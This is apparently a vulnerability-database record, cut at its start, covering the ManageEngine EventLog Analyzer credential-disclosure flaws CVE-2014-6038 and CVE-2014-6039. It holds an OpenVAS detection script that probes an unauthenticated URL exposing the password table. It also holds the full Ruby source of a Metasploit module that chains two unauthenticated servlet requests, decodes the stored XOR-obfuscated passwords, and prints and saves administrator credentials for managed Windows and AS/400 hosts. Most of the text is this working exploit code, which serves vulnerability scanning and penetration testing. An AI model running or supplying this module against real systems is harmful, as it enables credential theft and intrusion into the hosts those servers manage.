See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:zohocorp:manageengine_eventlog_analyzer';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105111\");\n script_cve_id(\"CVE-2014-6038\", \"CVE-2014-6039\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 11867 $\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"ManageEngine EventLog Analyzer Multiple Vulnerabilities\");\n\n script_xref(name:\"URL\", value:\"https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_eventlog_info_disc.txt\");\n\n script_tag(name:\"impact\", value:\"Exploiting this issue could allow an attacker read usernames and passwords.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a HTTP GET request and check the response.\");\n script_tag(name:\"solution\", value:\"Ask the Vendor for an update.\");\n script_tag(name:\"affected\", value:\"all versions from v7 to v9.9 build 9002.\");\n script_tag(name:\"summary\", value:\"ManageEngine EventLog Analyzer is prone to an information disclosure vulnerability.\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:48:11 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-11-06 16:38:34 +0100 (Thu, 06 Nov 2014)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_manageengine_eventlog_analyzer_detect.nasl\");\n 
script_mandatory_keys(\"me_eventlog_analyzer/installed\");\n script_require_ports(\"Services/www\", 8400);\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!get_app_location(cpe: CPE, port: port, nofork: TRUE))\n exit(0);\n\nurl = '/agentHandler?mode=getTableData&table=AaaPassword';\n\nif (http_vuln_check(port: port, url: url, pattern: \"AaaPassword createdtime\",\n extra_check: make_list(\"password\", \"password_id\", \"salt\"))) {\n report = report_vuln_url(port: port, url: url);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "metasploit": [{"lastseen": "2019-11-28T18:15:07", "bulletinFamily": "exploit", "description": "ManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that allow an unauthenticated user to obtain the superuser password of any managed Windows and AS/400 hosts. This module abuses both vulnerabilities to collect all the available usernames and passwords. First the agentHandler servlet is abused to get the hostid and slid of each device (CVE-2014-6038); then these numeric IDs are used to extract usernames and passwords by abusing the hostdetails servlet (CVE-2014-6039). 
Note that on version 7, the TARGETURI has to be prepended with /event.\n", "modified": "2018-09-15T23:54:45", "published": "2014-11-05T20:12:03", "id": "MSF:AUXILIARY/GATHER/EVENTLOG_CRED_DISCLOSURE", "href": "", "type": "metasploit", "title": "ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rexml/document'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure',\n 'Description' => %q{\n ManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that\n allow an unauthenticated user to obtain the superuser password of any managed Windows and\n AS/400 hosts. This module abuses both vulnerabilities to collect all the available\n usernames and passwords. First the agentHandler servlet is abused to get the hostid and\n slid of each device (CVE-2014-6038); then these numeric IDs are used to extract usernames\n and passwords by abusing the hostdetails servlet (CVE-2014-6039). 
Note that on version 7,\n the TARGETURI has to be prepended with /event.\n },\n 'Author' =>\n [\n 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2014-6038' ],\n [ 'CVE', '2014-6039' ],\n [ 'OSVDB', '114342' ],\n [ 'OSVDB', '114344' ],\n [ 'URL', 'https://seclists.org/fulldisclosure/2014/Nov/12' ]\n ],\n 'DisclosureDate' => 'Nov 5 2014'))\n\n register_options(\n [\n Opt::RPORT(8400),\n OptString.new('TARGETURI', [ true, 'Eventlog Analyzer application URI (should be /event for version 7)', '/']),\n ])\n end\n\n\n def decode_password(encoded_password)\n password_xor = Rex::Text.decode_base64(encoded_password)\n password = ''\n password_xor.bytes.each do |byte|\n password << (byte ^ 0x30)\n end\n return password\n end\n\n\n def run\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'agentHandler'),\n 'method' =>'GET',\n 'vars_get' => {\n 'mode' => 'getTableData',\n 'table' => 'HostDetails'\n }\n })\n\n unless res && res.code == 200\n fail_with(Failure::NotFound, \"#{peer} - Failed to reach agentHandler servlet\")\n return\n end\n\n # When passwords have digits the XML parsing will fail.\n # Replace with an empty password attribute so that we know the device has a password\n # and therefore we want to add it to our host list.\n xml = res.body.to_s.gsub(/&#[0-9]*;/,Rex::Text.rand_text_alpha(6))\n begin\n doc = REXML::Document.new(xml)\n rescue\n fail_with(Failure::Unknown, \"#{peer} - Error parsing the XML, dumping output #{xml}\")\n end\n\n slid_host_ary = []\n doc.elements.each('Details/HostDetails') do |ele|\n if ele.attributes['password']\n # If an element doesn't have a password, then we don't care about it.\n # Otherwise store the slid and host_id to use later.\n slid_host_ary << [ele.attributes['slid'], ele.attributes['host_id']]\n end\n end\n\n cred_table = Rex::Text::Table.new(\n 'Header' => 'ManageEngine EventLog Analyzer Managed Devices 
Credentials',\n 'Indent' => 1,\n 'Columns' =>\n [\n 'Host',\n 'Type',\n 'SubType',\n 'Domain',\n 'Username',\n 'Password',\n ]\n )\n\n slid_host_ary.each do |host|\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'hostdetails'),\n 'method' =>'GET',\n 'vars_get' => {\n 'slid' => host[0],\n 'hostid' => host[1]\n }\n })\n\n unless res && res.code == 200\n fail_with(Failure::NotFound, \"#{peer} - Failed to reach hostdetails servlet\")\n end\n\n begin\n doc = REXML::Document.new(res.body)\n rescue\n fail_with(Failure::Unknown, \"#{peer} - Error parsing the XML, dumping output #{res.body.to_s}\")\n end\n\n doc.elements.each('Details/Hosts') do |ele|\n # Add an empty string if a variable doesn't exist, we have to check it\n # somewhere and it's easier to do it here.\n host_ipaddress = ele.attributes['host_ipaddress'] || ''\n\n ele.elements.each('HostDetails') do |details|\n domain_name = details.attributes['domain_name'] || ''\n username = details.attributes['username'] || ''\n password_encoded = details.attributes['password'] || ''\n password = decode_password(password_encoded)\n type = details.attributes['type'] || ''\n subtype = details.attributes['subtype'] || ''\n\n unless type =~ /Windows/ || subtype =~ /Windows/\n # With AS/400 we get some garbage in the domain name even though it doesn't exist\n domain_name = \"\"\n end\n\n msg = \"Got login to #{host_ipaddress} | running \"\n msg << type << (subtype != '' ? \" | #{subtype}\" : '')\n msg << ' | username: '\n msg << (domain_name != '' ? 
\"#{domain_name}\\\\#{username}\" : username)\n msg << \" | password: #{password}\"\n print_good(msg)\n\n cred_table << [host_ipaddress, type, subtype, domain_name, username, password]\n\n if type == 'Windows'\n service_name = 'epmap'\n port = 135\n elsif type == 'IBM AS/400'\n service_name = 'as-servermap'\n port = 449\n else\n next\n end\n\n credential_core = report_credential_core({\n password: password,\n username: username,\n })\n\n host_login_data = {\n address: host_ipaddress,\n service_name: service_name,\n workspace_id: myworkspace_id,\n protocol: 'tcp',\n port: port,\n core: credential_core,\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n create_credential_login(host_login_data)\n end\n end\n end\n\n print_line\n print_line(\"#{cred_table}\")\n loot_name = 'manageengine.eventlog.managed_hosts.creds'\n loot_type = 'text/csv'\n loot_filename = 'manageengine_eventlog_managed_hosts_creds.csv'\n loot_desc = 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credentials'\n p = store_loot(\n loot_name,\n loot_type,\n rhost,\n cred_table.to_csv,\n loot_filename,\n loot_desc)\n print_status \"Credentials saved in: #{p}\"\n end\n\n\n def report_credential_core(cred_opts={})\n # Set up the has for our Origin service\n origin_service_data = {\n address: rhost,\n port: rport,\n service_name: (ssl ? 'https' : 'http'),\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: self.fullname,\n private_type: :password,\n private_data: cred_opts[:password],\n username: cred_opts[:username]\n }\n\n credential_data.merge!(origin_service_data)\n create_credential(credential_data)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/eventlog_cred_disclosure.rb"}]}